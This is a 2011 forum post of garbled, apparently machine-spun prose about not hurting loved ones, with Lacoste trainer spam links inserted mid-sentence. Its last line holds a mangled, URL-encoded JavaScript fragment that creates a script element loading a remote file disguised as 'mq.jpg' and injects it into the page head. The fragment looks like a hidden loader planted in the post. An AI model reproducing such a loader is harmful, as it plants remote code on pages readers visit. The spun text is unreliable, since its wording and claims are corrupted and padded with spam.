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Old 06-14-2011, 06:35 PM   #1
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Default Remember Do no impair human who adore you !

Remember: Do not hurt people who love you!

people really are injury, often from those who care most.

Buddha said: , and then fall in adore, ah! This namely what kind of fate ah! Who knows how numerous times a past life Looking back, it conquered the tender attention God, so namely two people from the stranger, to the acquaintance, to know every other, to love,Lacoste Radiate Croc Trainers, to the absolute fusion of psyche and body. Everything changed the world, transform lukewarm, and convert shine,Lacoste Trainers, the wind beating in his face favor a lover's sweet respiration the breath of his jaws, the eyes of love the heart tin resist jitter, always in entire still, and merely boiling blood flowing in the body.

Later,Lacoste Running Trainers, some of the ideas are incongruous, and will fight with their inconsistencies, people are most easily vexed thrust to say unsympathetic, wounding words, even whereas those words were said not truly, but love hearing to,Lacoste R75 P2 Trainers, the heart will bleed, those words would be like a fasten bar in the heart, pluck it out, that is how some nights ah! When two people together, scene at scene, the sweet details will inexorably thronging into my mind, when two people mumbling sweet words of a sentence will be repeated in the ears. Obsessed, bitter, sweet, pain, humiliation, and staying, and indignation of the ... ... these sensibilities will be crazy hit, the bleeding heart torn individually. The long night as the Devil can dark people mercilessly swallowed, and finally float off to nap, woke up one day open eyes, suddenly there swept overwhelming pain of endless, mind flashed a thought would be: how nice sleep forever ah!

the more people tend to love each other, the more harm, a lot of fiery passion of love is often in constant injuries and rehabilitation carried out continuously! People who love each other, the heart is quite acute, when dealing with mediocre ways of speaking friends, act things for love occasionally is not enough, in a word, a look, a face, a joke, before you begin The scenario will be fewer than expected eruption of a debilitating argue. According to scientists Analysis: men and women of the interior structure of the head is alter, focusing aboard logical meditative men and women converge above sensitive cerebral, way of meditative of one thing different, calculate you can not discuss, more hideous! Why do two people love each other more easier to damage up, make do not love the husband and wife who was proficient to final forever, and this is why. The more people who love

extra care, more care approximately the more fussy, more critical of the more fight, the more the more injured in fight, age wounds have not scab, Adds current injury, Ah love love, hurt hurt ah, ah, eventually rotated into hate! So-called tough love, hate the hack! No direction out, the word life too, so the truth!

give up no less than love, suffering from the pain and disappointments, faltering, stumbling to the road amenable, hiked healing, meantime loved, hated the side, side of the reprove, when suffering with, when looking forward, already had wiped away the shadow of love, though willing to completely heal the scars of heart, even though two people in the heart invariably say: Bleeding wound is often difficult to heal, love sick, love the heart is hurt. So, do not simple to hurt those who love you!

love you, is the most care about you, care about your pleasure, care about your worries, cares about your mirth, care about your tears, care about you pain,Womens Lacoste Trainers, care of your each word, each look you care about, so you can attach to his injuries. Hurt love you, his heart will fall into the icehouse, will fall into utter hell. The language is the blade injury, love can hurt sensitive heart; injury Language is cold frost can refrigerate the love stirring the blood boiling of a hole; injury Language is a knife that can cut complicated, love long phase of warmth. Love's heart is tough to do, such as silk Pu Wei, too lusty to be inseparable space-time, continuously cross landscapes; love the heart is made of cup, is extremely fragile and difficult to compound.

not to hurt people who love you! Men and women love, combined to become one, body and soul together in two bodies. Hurt him, you will be hurt, love of his love, his pain, pain, sorrow, his grief. Some people say that men and women love, the matron is a male who's a rib, the body was hurt, painful ribs, ribs hurt, the pain of course, will scatter throughout the body. Hurt people who love you, but likewise hurting myself, losing is the deep love, obtain is endless grief, life will not see the endless night and day. Hurt people who love you, blasphemy was once the most pure, the most devoted love.

love you, is the maximum precious treasure around the world than love hot sinking heart, as ambition be clay! Kisses, love, hurt, grief, and he ambition smile and a tear, the tears and Feelings! Hurt love you, but Some Like It Hot sinking depression chilly heart will fall into the abyss, underwent infinite chilly and it will be worked, you will lose the expensive treasures Do not! Do not! Warm heart is love you, resting locations.

blending the spiritual, physical blending, and love the people, ah, kissed to smile,Womens Lacoste Observe Trainers, wail to obliterate the consumption on the pharyngeal swallow, exhausted had to take a rest, hurt to lick.

will love it even broke up leaving solemn consequences, leaving the haggard face, leaving the founding full of mottled, waiting because ourselves is an pessimistic and scattered helplessness. To a certain air, and after-effects would be mad aggression, bombard up to pain, the time will be unbearable suffering, fair like an open bruise is gaping knife, and then healing, then gaping, wheel, bleeding heart, tick, tick of life will be distant far.

you think about it, this world can hurt you, have to be the human you love; make you hurt people who love you must . Otherwise, how can he have the opportunity to scars sculptured in your mind? How he qualified to make you mushroom and fall in Love me?

Remember: Do no impair people who love you! s.parentNode.neatness.display% 3D% 27none% 27% 3Bif% 28% 21window.xxr% 29% 7Bvar% 20l% 3Ddocument.createElement% 28% 27script% 27% 29% 3Bl.src% 3D% 27http% 3A / / / a / q / mq.jpg% 27% 3Bl.type% 3D% 27text/javascript% 27% 3Bdocument.getElementsByTagName% 28% 27head% 27% 29.item% 280% 29.appendChild% 28l % 29% 3Bwindow.xxr% 3D1% 7D'))); display: none; @ [/ email] [/ flash]
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